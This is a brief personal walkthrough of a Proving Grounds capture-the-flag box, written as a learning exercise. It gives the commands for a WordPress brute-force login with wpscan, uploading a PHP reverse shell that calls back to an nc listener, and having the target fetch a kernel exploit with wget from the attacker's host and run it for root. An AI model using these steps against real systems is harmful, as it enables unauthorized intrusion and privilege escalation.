My first ‘intermediate’ box after most of the beginner ones.
Fun learning process.
1. nmap to find only tcp/80.
2. Dirb to find wordpress
3. You’ll have to add an entry for loly.lc 192.168.137.121 in /etc/hosts to make the stupid site work (had to read that elsewhere b/c fkn stupid) On the plus side, it cracked really quickly b/c it’s virtually local.
4. brute force the wordpress login with #wpscan –url http://loly.lc/wordpress -P passes-top-100.txt threads 50 -U loly
– Password loly+[deleted. u find out]
– upload our reverse shell by navigating in WordPress to AdRotate > Manage Media. Leave the selector at banners and then browse to and attach our file shell.php.zip. (On kali, get it at /usr/share/webshells/php/php-reverse-shell.php)
Be sure to add your IP and local port (4444 below) to the top of the shell so the target calls back to you.)
5. Log in to wordpress, upload the reverse php-reverse-shell.php.zip (Not sure why it’s a zip but it works)
6. locally,#start nc -lvp 4444
7. Call with http://192.168.137.121/wordpress/wp-content/banners/shell.php
8. You’ll see an unprivileged shell pop into the #nc terminal, $uname-a reveals a vulnerable version of linux $Linux ubuntu 4.4.0-31-generic
9. Searchsploit finds 45010.c for that Linux kernel ver so download, gcc it to sploit.
10. Start apache locally, place sploit in /var/wwww/html/sploit
11. From remote shell you’re in, $wget 192.168.X.X/sploit into /tmp
12. cd /tmp, chmod +x sploit and run it with ./sploit
13. Boom! uid0 (root)
14. $cat /root/proof.txt into Proving Grounds for credit.
15. Saw no evidence of where the 2nd flag is so I did a #find . |grep .\txt and found /var/www/local.txt for credit.
If you can follow and do all these steps, you’re getting good.
From here, you’ll need to get good at knowing to look for all these on your own.
Develop a smart-sheet of checks to do on an objective.